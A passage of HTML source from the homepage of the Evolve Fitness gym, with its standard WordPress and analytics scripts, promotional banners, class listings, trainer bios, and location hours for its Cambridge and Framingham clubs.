k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <link rel='stylesheet' id='sb-font-awesome-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' type='text/css' media='all' /> <script type='text/javascript' src='https://evolvefitnessinc.com/wp/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <link rel='https://api.w.org/' href='https://evolvefitnessinc.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://evolvefitnessinc.com/wp/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://evolvefitnessinc.com/wp/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.7.13" /> <link rel='shortlink' href='https://evolvefitnessinc.com/' /> <link rel="alternate" type="application/json+oembed" href="https://evolvefitnessinc.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fevolvefitnessinc.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://evolvefitnessinc.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fevolvefitnessinc.com%2F&#038;format=xml" /> <link rel="alternate" hreflang="en-us" href="https://evolvefitnessinc.com/" /><link rel="icon" href="https://evolvefitnessinc.com/wp/wp-content/uploads/2017/09/favicon-min.png" sizes="32x32" /> <link rel="icon" href="https://evolvefitnessinc.com/wp/wp-content/uploads/2017/09/favicon-min.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://evolvefitnessinc.com/wp/wp-content/uploads/2017/09/favicon-min.png" /> <meta name="msapplication-TileImage" content="https://evolvefitnessinc.com/wp/wp-content/uploads/2017/09/favicon-min.png" /> <base href="https://evolvefitnessinc.com" /> <!-- Schema.org --> <!-- <div itemscope itemtype="https://schema.org/HealthClub"> <span itemprop="name">Evolve Fitness</span> <div itemprop="address" itemscope itemtype="https://schema.org/PostalAddress"> <span itemprop="streetAddress">52 New Street</span> <span itemprop="addressLocality">Cambridge</span>, <span itemprop="addressRegion">MA</span> <span itemprop="postalCode">02138</span> </div> Phone: <span itemprop="telephone">617.354.1000</span> </div> --> <!-- Hotjar Tracking Code for https://rockwoodweb.com --> <!--<script> (function(h,o,t,j,a,r){ h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)}; h._hjSettings={hjid:178868,hjsv:5}; a=o.getElementsByTagName('head')[0]; r=o.createElement('script');r.async=1; r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv; a.appendChild(r); })(window,document,'//static.hotjar.com/c/hotjar-','.js?sv='); </script>--> <!-- Hotjar Tracking Code for https://evolvefitnessinc.com --> <script> (function(h,o,t,j,a,r){ h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)}; h._hjSettings={hjid:719615,hjsv:6}; a=o.getElementsByTagName('head')[0]; r=o.createElement('script');r.async=1; r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv; a.appendChild(r); })(window,document,'https://static.hotjar.com/c/hotjar-','.js?sv='); </script> <!-- ReachLocal Tracking Code--> <script type="text/javascript" src="//cdn.rlets.com/capture_configs/273/cba/c0e/3c64025bdf1bd64cff3f515.js" async="async"></script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-28084680-1', 'auto'); ga('send', 'pageview'); </script> </head> <body class=""> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TNLZ6XJ" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <header> <a href="https://evolvefitnessinc.com" id="logo"> <!-- LOGO --> <img src='https://evolvefitnessinc.com/wp/wp-content/uploads/2018/11/logo-updated-min.png' alt='Evolve Fitness' /> <!-- END LOGO --> </a> <div id="navRight"> <div id="nav" class="darkBlue"> <div id="mobileNav" class="mobile">MENU</div> <div id="topNav" class="dt"> <div class="topNav"><ul id="menu-top-nav" class="menu"><li id="menu-item-21" class="first menu-item-type-custom menu-item-object-custom menu-item-21 menu-item-media"><a href="#clubs">Locations</a></li> <li id="menu-item-4452" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4452 menu-item-join-online"><a href="/special-offers/">Special Offers</a></li> <li id="menu-item-22" class="last menu-item-type-post_type menu-item-object-page menu-item-22 menu-item-sign-in-register"><a href="https://evolvefitnessinc.com/sign-in-register/">Member Login</a></li> </ul></div> </div> <div id="mainNav" class="dt"> <div class="mainyNav"><ul id="menu-main-nav" class="menu"><li id="menu-item-10" class="first menu-item-type-custom menu-item-object-custom menu-item-10 menu-item-classes"><a href="/group-fitness-classes/">Group Fitness</a></li> <li id="menu-item-11" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-11 menu-item-trainers"><a href="/personal-training/">Personal Training</a></li> <li id="menu-item-8" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8 menu-item-home"><a href="/hot-yoga-studio-classes/">Yoga Studio</a></li> <li id="menu-item-5878" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5878 menu-item-cycle-studio"><a href="https://evolvefitnessinc.com/group-exercise-classes/cycle-studio/">Cycle Studio</a></li> <li id="menu-item-9" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9 menu-item-clubs"><a href="/personal-training-special/">Group Training</a></li> <li id="menu-item-1034" class="last menu-item-type-custom menu-item-object-custom menu-item-1034 menu-item-featured-video"><a href="/join/">Join Now</a></li> </ul></div> </div> </div> <div id="navOffer" onClick="ga('send','event','button','click','Get Free Pass');"> <p><span class="oh1">DOWNLOAD YOUR</span><br /> <span class="oh2">3-DAY PASS</span></p> </div> </div> <div style="clear:both;"></div> </header><section id="home"> <div id="slider"> <ul class="bannerWrap" style="width:500%;"><li class="banner evolve-yoga-studio" style="width:20%; background-image:url(https://evolvefitnessinc.com/wp/wp-content/uploads/2018/11/yoga-banner-transp-min.jpg);"><div class="contentWrapper"> <div class="fram"> <p style="font-size: 0.7em;color: #f89728;" class="fram1">Introducing Evolve Yoga Studio!</p> <div class="framb"> <p style="margin-bottom: 6px;margin-top: 0.25em;font-size: 1.25em;color: rgba(255,255,255,0.8);" class="fram3">Get one month of</p> <p style="font-size: 1.25em;display: block;margin-bottom: 0.25rem;" class="fram2">UNLIMITED YOGA</p> <p style="font-size: 1.25em;vertical-align: top;margin-right: -6px;color: rgba(255,255,255,0.8);" class="fram3">for only</p> <p style="margin-bottom: 1.25rem;font-size:2em;" class="fram2">$35!</p> </div> <p style="color: #fff;"><a class="btn" style="display: inline-block; line-height: 40px;padding: 10px 30px 6px;" href="/hot-yoga-studio-classes/">SIGN UP TODAY</a></p> </div> </div></li><li class="banner new-framingham-location" style="width:20%; background-image:url(https://evolvefitnessinc.com/wp/wp-content/uploads/2018/09/newLocation_heroNew-min.jpg);"><div class="contentWrapper"> <div class="fram"> <p class="fram1" style="margin-bottom:1rem;line-height:1;"><span style="font-size:0.75em;color:#f89728;font-weight:700;letter-spacing: 0.05rem;display: block;">GRAND OPENING SPECIAL!</span><span style="font-weight:500;font-size:0.65em;color:#f89728;display: block;"><img style="width:440px;display:block;margin:16px 0 24px;" src="/wp/wp-content/uploads/2018/09/evolve_logo-min.png" alt="Evolve Fitness &amp; Studios Framingham" /></span></p> <div class="head-shot">New Location! New Facility!</div> <div class="blurb">Try our new amenities: Dedicated Yoga Studio and Spin Studios, Group/Small Group Training Studio PLUS the area’s BEST INSTRUCTORS!&#8221;</div> <div class="framb" style="margin-bottom:-1rem;"> <p style="color: #fff;margin-top:1rem;"><a class="btn" style="display: inline-block; line-height: 40px;padding: 10px 30px 6px;" href="/framingham-gym-grand-opening/">SIGN UP TODAY</a></p> </div> </div></li><li class="banner eburn360" style="width:20%; background-image:url(https://evolvefitnessinc.com/wp/wp-content/uploads/2013/01/eburn-slider-v2-min.jpg);"><div class="contentWrapper"><p> </p> <p style="opacity: 0;">Refer a friend and earn $100 cash!</p> <p><a class="btn" href="/personal-training-special/">LEARN MORE</a></p> </div></li><li class="banner myzone" style="width:20%; background-image:url(https://evolvefitnessinc.com/wp/wp-content/uploads/2017/09/myzone_banner_page-min.jpg);"><div class="contentWrapper"> <div class="fram"> <p class="fram1" style="margin-bottom:30px;">MyZone</p> <div class="framb"> <p class="fram3" style="margin-bottom:0px;">Make Every Session Count</p> </div> <p class="mobile-margin-top" style="color: #fff;margin-top:64px;"><a class="btn" style="display: inline-block; line-height: 40px;padding: 10px 30px 6px;" href="/myzone/">LEARN MORE</a></p> </div> </div></li><li class="banner e-cryo" style="width:20%; background-image:url(https://evolvefitnessinc.com/wp/wp-content/uploads/2017/10/banner-ecryo-min.jpg);"><div class="contentWrapper"><p> </p> <div class="fram"> <p class="fram1" style="margin-bottom: 30px;">E-Cryo</p> <div class="framb"> <p class="fram3" style="margin-bottom: 0px;">COMING SOON</p> </div> <p class="mobile-margin-top" style="color: #fff; margin-top: 60px;"><a class="btn" style="display: inline-block; line-height: 40px; padding: 10px 30px 6px; margin-bottom: 4px;" href="/e-cryo/">LEARN MORE</a></p> </div> </div></li> </ul> <div class="slider-controls"> </div> <a class="slider-left slider-arrow" href="#">&lsaquo;</a> <a class="slider-right slider-arrow" href="#">&rsaquo;</a> </div> <div class="mobile" style="text-align:center;"> <p style="font-size:1.6em; margin:20px 0 0;">Cambridge</p> <a href="tel:6173541000" style="font-size:2em; display:block;"> <i class="fa fa-phone"></i> 617-354-1000 </a> <p style="font-size:1.6em; margin:20px 0 0;">Framingham</p> <a href="tel:5088796200" style="font-size:2em; display:block;"> <i class="fa fa-phone"></i> 508-879-6200 </a> </div> <div id="sliderBtm"> <div class="contentWrapper new-callout"> <p class="title">All New - Evolve Fitness & Studios Framingham!</p> <p class="sub-header">New Location with a modern interior design, lighting & sound.</p> <p>All <strong>New</strong> Amenities include:</p> <div class="background"> <ul> <li><a href="/hot-yoga-studio-classes/"><strong>Dedicated Yoga Studio</strong></a> with 5 different types of classes including Hot Yoga (up to 105F) TOP professional YOGA Instructors</li> <li><a href="/group-exercise-classes/induro-spinning/"><strong>Dedicated Spin Studio</strong></a> with Amazing Sound, Lighting,Video, & Heart Rate Monitor Technology</li> <li><a href="/personal-training-special/"><strong>Group Training Studio</strong></a> - Unlimited small group training designed and run by our personal trainers to give the community, support, motivation and guidance of boutique studio at a FRACTION of the cost.</li> <li>State of the art equipment by <strong>Rogue, Life Fitness, Matrix and More</strong>!</li> </ul></div> <!-- <div id="specialOffers"> <p class="title">UPDATES</p> // <p> <a href="/join/" target="_blank" onClick="ga('send','event','button','click','Updates Cambridge');"> <br/> <span style="display:inline-block; margin-top:10px; font-size:.8em;">Click Here &raquo;</span> </a> </p> // <p> <a href="/join/" target="_blank" onClick="ga('send','event','button','click','Updates Framingham');"> // <br/> <span style="display:inline-block; margin-top:10px; font-size:.8em;">Click Here &raquo;</span> </a> </p> // </div>--> </div> </div> </div> </section> <div class="scrollDown"></div><section><a class="subLink" href="#" name="clubs"><span class="hide-SEO">clubs</span></a><div class="sectionBanner clubs" style="background-image:url(https://evolvefitnessinc.com/wp/wp-content/uploads/2015/07/banner_clubs-min.jpg);"><div class="contentWrapper"><p class="sectionCaption">Evolve Fitness in Cambridge and Framingham</p></div></div><div class="sectionContent contentWrapper "><h1><span class="orange">Evolve Fitness &#8211; Health Clubs in Cambridge and Framingham</span></h1> <p><span class="subtitle">Are you looking for a gym in cambridge or a gym in framingham? we serve members from all local ma communities. <a class="orange" href="/join/">Sign up online today!</a></span></p> <div class="vidLink col3" onClick="ga('send','event','video','play','Homepage Video');"> <div class="vid" data-link="https://player.vimeo.com/video/110282206?title=0&amp;byline=0&amp;portrait=0">Watch Our Video</div> </div> <div class="address col3"> <p class="title orange">Cambridge</p> <p><a href="tel:617-354-1000" class="phone blue" onClick="ga('send','event','button','click','Click to Call Cambridge Homepage');">617.354.1000</a></p> <p>52 NEW STREET<br /> CAMBRIDGE, MA</p> <p>MON-THU: 5AM-10PM<br /> FR: 5AM-9PM<br /> SAT-SUN: 7AM-8PM</p> <p><a class="btn" href="/locations/evolve-fitness-cambridge-ma" onClick="ga('send','event','button','click','Get Directions Cambridge');">Details and Directions</a></p> <p>&nbsp;</p> </div> <div class="address col3 col3last"> <p class="title orange">Framingham</p> <p><a href="tel:508-879-6200" class="phone blue" onClick="ga('send','event','button','click','Click to Call Framingham Homepage');">508.879.6200</a></p> <p>11 CALIFORNIA AVENUE<br /> FRAMINGHAM, MA</p> <p>MON-THU: 5AM-10PM<br /> FR: 5AM-9PM<br /> SAT-SUN: 7AM-6PM</p> <p><a class="btn" href="evolve-fitness-framingham-ma" onClick="ga('send','event','button','click','Get Directions Framingham');">Details and Directions</a></p> </div> </div></section><div class="scrollDown"></div><section><a class="subLink" href="#" name="classes"><span class="hide-SEO">classes</span></a><div class="sectionBanner classes" style="background-image:url(https://evolvefitnessinc.com/wp/wp-content/uploads/2015/07/fitness-classes-framingham-cambridge.png);"><div class="contentWrapper"><p class="sectionCaption">Group exercise classes in Cambridge and Framingham</p></div></div><div class="sectionContent contentWrapper "><h2><span class="orange">Group Exercise and Classes</span></h2> <p class="subtitle">We offer dozens of classes taught by superstar instructors passionate about fitness.</p> <div class="col3"> <p><a class="btn" href="/group-fitness-classes/">Class Schedules</a></p> <p class="desc">Our 27 Certified &amp; Experienced Instructors go the extra mile and bring you along!</p> </div> <div class="col3"> <p><a class="btn" href="/group-fitness-classes/">Class Details</a></p> <p class="desc">Over 80 group exercise classes a month, including:</p> <ul class="plain classList"> <li><a href="/group-fitness-classes/bodycombat/"><img src="/wp/wp-content/uploads/2017/02/bodycombat.jpg" alt="BodyCombat" /></a><a href="/free-fitness-pass/" class="pass" onClick="ga('send','event','button','click','Free Pass Class Details');"><img src="/wp/wp-content/uploads/2017/02/freepass.jpg" alt="Free Pass" /></a></li> <li><a href="/group-fitness-classes/bodypump/"><img src="/wp/wp-content/uploads/2017/02/bodypump.jpg" alt="BodyPump" /></a><a href="/free-fitness-pass/" class="pass" onClick="ga('send','event','button','click','Free Pass Class Details');"><img src="/wp/wp-content/uploads/2017/02/freepass.jpg" alt="Free Pass" /></a></li> <li><a href="/group-fitness-classes/bodyattack/"><img src="/wp/wp-content/uploads/2017/02/bodyattack.jpg" alt="BodyAttack" /></a><a href="/free-fitness-pass/" class="pass" onClick="ga('send','event','button','click','Free Pass Class Details');"><img src="/wp/wp-content/uploads/2017/02/freepass.jpg" alt="Free Pass" /></a></li> <li><a href="/group-fitness-classes/cxworx/"><img src="/wp/wp-content/uploads/2017/02/cxworx.jpg" alt="CXWorx" /></a><a href="/free-fitness-pass/" class="pass" onClick="ga('send','event','button','click','Free Pass Class Details');"><img src="/wp/wp-content/uploads/2017/02/freepass.jpg" alt="Free Pass" /></a></li> <li><a href="/group-fitness-classes/zumba/"><img src="/wp/wp-content/uploads/2017/02/zumba.jpg" alt="Zumba" /></a><a href="/free-fitness-pass/" class="pass" onClick="ga('send','event','button','click','Free Pass Class Details');"><img src="/wp/wp-content/uploads/2017/02/freepass.jpg" alt="Free Pass" /></a></li> <li><a href="/spinning/"><img src="/wp/wp-content/uploads/2017/02/spinning.jpg" alt="Spinning" /></a><a href="/free-fitness-pass/" class="pass" onClick="ga('send','event','button','click','Free Pass Class Details');"><img src="/wp/wp-content/uploads/2017/02/freepass.jpg" alt="Free Pass" /></a></li> <li><a href="/group-fitness-classes/pilatesis/"><img src="/wp/wp-content/uploads/2017/02/pilates.jpg" alt="Pilates" /></a><a href="/free-fitness-pass/" class="pass" onClick="ga('send','event','button','click','Free Pass Class Details');"><img src="/wp/wp-content/uploads/2017/02/freepass.jpg" alt="Free Pass" /></a></li> <li><a href="/group-fitness-classes/yoga/"><img src="/wp/wp-content/uploads/2017/02/yoga.jpg" alt="Yoga Pass" /></a><a href="/free-fitness-pass/" class="pass" onClick="ga('send','event','button','click','Free Pass Class Details');"><img src="/wp/wp-content/uploads/2017/02/freepass.jpg" alt="Free Pass" /></a></li> </ul> </div> <div class="col3 col3last"> <p class="btn">Daycare Schedules</p> <p class="desc">We provide care for children of members when they are exercising in the gym.</p> <ul class="plain"> <li><b>Cambridge</b></li> <li>Monday-Sunday: 8AM-12PM</li> <li>Monday-Thursday: 4PM-8PM</li> </ul> </div> <div class="divider"> </div> </div></section><div class="scrollDown"></div><section><a class="subLink" href="#" name="featured-video-tip"><span class="hide-SEO">featured-video-tip</span></a><div class="sectionContent contentWrapper noBanner"><div style="display:none;"> <h2><span class="orange">Featured Video Tip</span></h2> <p class="lm" style="text-align: right; color: #00a4e4; font-size:14px;"><a class="lm" href="/votd/" style="font-size:14px;">SEE MORE</a></p> <div class="instaVid"> <iframe onclick="ga('send','event','video','play','Featured Video');" src="https://instagram.com/p/BKA-_7vjxUL/embed/" width="612" height="710" class="insta-image-embed" style="height: 709.92px;border: 0;"></iframe> </div> <div class="instaCopy"> <p class="">You've seen the ladder out in our gym and might have thought "what on earth can I do on that". Here's a little inspiration from @kaisafit who absolutely crushes ladder drills with perfect form and a great attitude! Next time you're in the gym, grab the ladder and get moving! </p> </div> </div> </div></section><section><a class="subLink" href="#" name="our-trainers"><span class="hide-SEO">our-trainers</span></a><div class="sectionContent contentWrapper noBanner"><h2><span class="orange">Our Trainers</span></h2> <p><span class="subtitle">Personal Training can Change Your Life</span></p> <div class="col3"> <p><img class="alignnone size-full wp-image-74" src="/wp/wp-content/uploads/2015/08/lose-weight.png" alt="lose-weight" width="133" height="132" /></p> <p class="subtitle orange">Lose Pounds</p> <p>Lose a little or lose a lot.<br /> The goal is your well being!</p> </div> <div class="col3"> <p><img class="alignnone size-full wp-image-75" src="/wp/wp-content/uploads/2015/08/performance.png" alt="performance" width="134" height="132" /></p> <p class="subtitle orange">Performance</p> <p>Our trained professionals are here to assist you in creating and meeting your performance goals.</p> </div> <div class="col3 col3last"> <p><img class="alignnone size-full wp-image-76" src="/wp/wp-content/uploads/2015/08/improve-health.png" alt="improve-health" width="133" height="132" /></p> <p class="subtitle orange">Improve Health</p> <p>Lower your cholesterol, lose weight, increase your energy, improve your outlook on Life!</p> </div> <div class="divider" style="margin-bottom: 30px;"> </div> <p class="subtitle">PROFESSIONAL AND PASSIONATE TRAINERS MAKE A BIG DIFFERENCE.<br /> MEET THE TRAINERS WHO HELP YOU REALIZE YOUR DREAM</p> <div class="evMediaContainer"><div class="evPost team-members"><div class="evPostImg thmb"><img src="https://evolvefitnessinc.com/wp/wp-content/uploads/2018/08/trainer_ryan-min-150x150.jpg" alt="Trainer"/></div><div class="evPostContent"><p class="subtitle orange">Ryan Teal, Personal Training Director - Cambridge</p><p>RYAN TEAL is a Director of Personal Training for Cambridge. Ryan&rsquo;s entire life has been consumed by sports and exercise! Ryan was a collegiate wrestler for 2 years and unfortunately due to injury his career was cut short. This injury was the catalyst for him to begin studying kinesiology. After completing his undergraduate studies in exercise science at Colorado Mesa University, he understood the importance of movement and nutrition. He became a personal trainer and coach to help educate others. Enthusiasm is his worst character flaw, along with bringing passion and energy to every training session. His goal is to push people past their comfort zone to achieve the results and goals they have set for themselves.</p><a href="https://evolvefitnessinc.com/team-members/ryan-teal/" class="lm">READ MORE</a></div><div style="clear:both;"></div></div><div class="evPost team-members"><div class="evPostImg thmb"><img src="https://evolvefitnessinc.com/wp/wp-content/uploads/2016/08/LenaS-150x150.jpg" alt="Trainer"/></div><div class="evPostContent"><p class="subtitle orange">Lena SIOTIS, Personal Trainer - Cambridge</p><p>LENA SIOTIS is hard working personal trainer who is dedicated to helping you reach your fitness goals. She received her bachelors degree in Exercise and Sports Science at Fitchburg State University where she began her journey in the fitness industry. During her studies she accumulated a great deal of experience with athletes by working with the athletic trainers and after graduating she continued to expand into adult and special populations. She is confident that with the right tools and positive mindset anything can be achieved. Aside from her bachelors degree she is also Functional Movement Systems (FMS) certified.</p><a href="https://evolvefitnessinc.com/team-members/lena-siotis/" class="lm">READ MORE</a></div><div style="clear:both;"></div></div><div class="evPost team-members"><div class="evPostImg thmb"><img src="https://evolvefitnessinc.com/wp/wp-content/uploads/2019/03/806_EVL_Welcome_Trainer_02-08-19_Carolina-1-150x150.png" alt="Trainer"/></div><div class="evPostContent"><p class="subtitle orange">STUART KANE CERTIFIED PERSONAL TRAINER, AAPT, Cambridge</p><p>After a long career in higher education, STUART KANE has directed his passion for fitness and helping others into personal training. A graduate of AAPT (American Academy of Personal Training) and currently completing his NASM certification (National Academy of Sports Medicine), he is committed to encouraging individuals at any age or fitness level achieve their personal goals. He has competed in dozens of marathons, half marathons and multi-sport events, and is passionate about kettlebell sport lifting, cycling, hiking and more. He believes that encouraging individuals to integrate a healthy body / mind approach to fitness will yield long-lasting, positive results. Learning to identify and overcome personal obstacles is a necessary step in building a stronger, healthier body and an enhanced sense of self. Stuart works closely with clients of all abilities using a variety of training techniques and tools to help them realize their individual goals.</p><a href="https://evolvefitnessinc.com/team-members/stuart-kane-certified-personal-trainer-aapt/" class="lm">READ MORE</a></div><div style="clear:both;"></div></div></div> <p class="blue" style="text-transform: uppercase; margin-top: 20px;"><a href="trainers/">Meet the rest of our team »</a></p> </div></section><div class="scrollDown"></div><section><a class="subLink" href="#" name="our-videos-and-photos"><span class="hide-SEO">our-videos-and-photos</span></a><div class="sectionContent contentWrapper noBanner withBg" style="background-color:#ebebec;"><h2><span class="orange">Our Videos and Photos</span></h2> <p class="subtitle">WHEN YOU JOIN EVOLVE FITNESS YOU BECOME PART OF THE FAMILY<br /> THAT WORKS OUT TOGETHER.</p> <div id="sb_instagram" class="sbi sbi_mob_col_auto sbi_col_4" style="width:100%; padding-bottom: 10px; " data-id="2207690613" data-num="20" data-res="auto" data-cols="4" data-options='{&quot;sortby&quot;: &quot;none&quot;, &quot;showbio&quot;: &quot;false&quot;,&quot;feedID&quot;: &quot;2207690613&quot;, &quot;headercolor&quot;: &quot;&quot;, &quot;imagepadding&quot;: &quot;5&quot;,&quot;mid&quot;: &quot;M2E4MWE5Zg==&quot;, &quot;disablecache&quot;: &quot;false&quot;, &quot;sbiCacheExists&quot;: &quot;true&quot;,&quot;callback&quot;: &quot;MDY5YjFjZWFmNmFm.NGUwNjhkZGNiMzBhMDM4MThmZWM=&quot;, &quot;sbiHeaderCache&quot;: &quot;true&quot;}'><div id="sbi_images" style="padding: 5px;"><div class="sbi_loader"></div></div><div id="sbi_load" class="sbi_hidden"><a class="sbi_load_btn" href="javascript:void(0);" style="display: none; "><span class="sbi_btn_text">Load More...</span><span class="sbi_loader sbi_hidden"></span></a><span class="sbi_follow_btn"><a href="https://www.instagram.com/" style="" target="_blank"><i class="fa fab fa-instagram"></i>Follow on Instagram</a></span></div></div> <div class="scrollDown"></div> </div></section><section class="noScroll"><a class="subLink" href="#" name="mobile-app"><span class="hide-SEO">mobile-app</span></a><div class="sectionContent contentWrapper noBanner"><div class="leftCol"> <h2><span class="orange">Mobile App</span></h2> <p class="subtitle">WELCOME TO THE EVOLVE FITNESS APP! WHEN YOU’RE A MEMBER OF EVOLVE FITNESS, YOU BELONG TO A CLUB THAT EMPHASIZES FUN, FITNESS, AND A CHANGED-FOR-THE-BETTER YOU. WHETHER IT’S JUST GETTING YOURSELF “TUNED UP”, OR PREPARING YOURSELF FOR A TRIATHLON, THIS IS THE PLACE TO BE. AND NOW WITH OUR MOBILE APP YOU CAN TAKE THAT EXPERIENCE WITH YOU WHEREVER YOU GO.</p> <ul class="plain" style="margin-bottom: 20px;"> <li>CLUB CARD</li> <li>CLASS SCHEDULES</li> <li>MANAGE ACCOUNT</li> <li>CLUB ALERTS</li> <li>SOCIAL MEDIA</li> <li>FITNESS CALCULATORS</li> <li>CONTACT US</li> <li>FITNESS ASSESSMENT</li> </ul> <p class="mobileLinks"><a href="https://itunes.apple.com/us/app/evolve-fit/id996230693?mt=8" target="_blank" onClick="ga('send','event','button','click','Download Mobile App');"><img class="alignnone wp-image-899 size-full" src="https://evolvefitnessinc.com/wp/wp-content/uploads/2015/08/2000px-Available_on_the_App_Store_black_SVG.svg_.png" alt="Available on the App Store" width="135" height="40" /></a><a href="https://play.google.com/store/apps/details?id=com.netpulse.mobile.evolvefitness&#038;hl=en" target="_blank" onClick="ga('send','event','button','click','Download Mobile App');"><img class="alignnone size-full wp-image-122" src="https://evolvefitnessinc.com/wp/wp-content/uploads/2015/08/googleplay_badge.png" alt="googleplay_badge" width="110" height="40" /></a></p> <p>Available on the Apple App Store and Google Play (keyword EVOLVEFIT)</p> </div> <div class="rightCol"><img class="alignnone wp-image-449 size-full" style="margin-top: 30px;" src="https://evolvefitnessinc.com/wp/wp-content/uploads/2015/08/533_EVL_iPhone_10-28.png" alt="EVL iPhone" width="314" height="635" srcset="https://evolvefitnessinc.com/wp/wp-content/uploads/2015/08/533_EVL_iPhone_10-28.png 314w, https://evolvefitnessinc.com/wp/wp-content/uploads/2015/08/533_EVL_iPhone_10-28-148x300.png 148w" sizes="(max-width: 314px) 100vw, 314px" /></div> </div></section> <footer class="contentWrapper"> <a href="https://evolvefitnessinc.com" id="footlogo"> <!-- LOGO --> <img src='https://evolvefitnessinc.com/wp/wp-content/uploads/2018/11/logo-updated-min.png' alt='Evolve Fitness' /> <!-- END LOGO --> </a> <ul class="footerNav"> <li id="menu-item-427" class="first menu-item-type-post_type menu-item-object-page menu-item-427 menu-item-special-offers"><a href="https://evolvefitnessinc.com/special-offers/">Special Offers</a></li> <li id="menu-item-414" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-414 menu-item-home-2"><a href="https://evolvefitnessinc.com/">Home</a></li> <li id="menu-item-423" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-423 menu-item-locations"><a href="https://evolvefitnessinc.com/locations/">Locations</a> <ul class="sub-menu"> <li id="menu-item-424" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-424 menu-item-evolve-fitness-cambridge-ma"><a href="https://evolvefitnessinc.com/locations/evolve-fitness-cambridge-ma/">Cambridge</a></li> <li id="menu-item-425" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-425 menu-item-evolve-fitness-framingham-ma"><a href="https://evolvefitnessinc.com/locations/evolve-fitness-framingham-ma/">Framingham</a></li> </ul> </li> <li id="menu-item-415" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-415 menu-item-group-exercise-classes"><a href="https://evolvefitnessinc.com/group-exercise-classes/">Classes</a> <ul class="sub-menu"> <li id="menu-item-416" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-416 menu-item-les-mills-bodyattack"><a href="https://evolvefitnessinc.com/group-exercise-classes/les-mills-bodyattack/">BodyAttack™</a></li> <li id="menu-item-417" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-417 menu-item-les-mills-bodycombat"><a href="https://evolvefitnessinc.com/group-exercise-classes/les-mills-bodycombat/">BodyCombat™</a></li> <li id="menu-item-418" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-418 menu-item-les-mills-bodypump"><a href="https://evolvefitnessinc.com/group-exercise-classes/les-mills-bodypump/">BodyPump™</a></li> <li id="menu-item-4676" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4676 menu-item-les-mills-bodyflow"><a href="https://evolvefitnessinc.com/group-exercise-classes/les-mills-bodyflow/">BodyFlow™</a></li> <li id="menu-item-419" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-419 menu-item-les-mills-cxworx"><a href="https://evolvefitnessinc.com/group-exercise-classes/les-mills-cxworx/">CxWorx™</a></li> <li id="menu-item-420" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-420 menu-item-pilates"><a href="https://evolvefitnessinc.com/group-exercise-classes/pilates/">Pilates</a></li> <li id="menu-item-421" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-421 menu-item-yoga"><a href="https://evolvefitnessinc.com/group-exercise-classes/yoga/">Yoga</a></li> <li id="menu-item-422" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-422 menu-item-zumba"><a 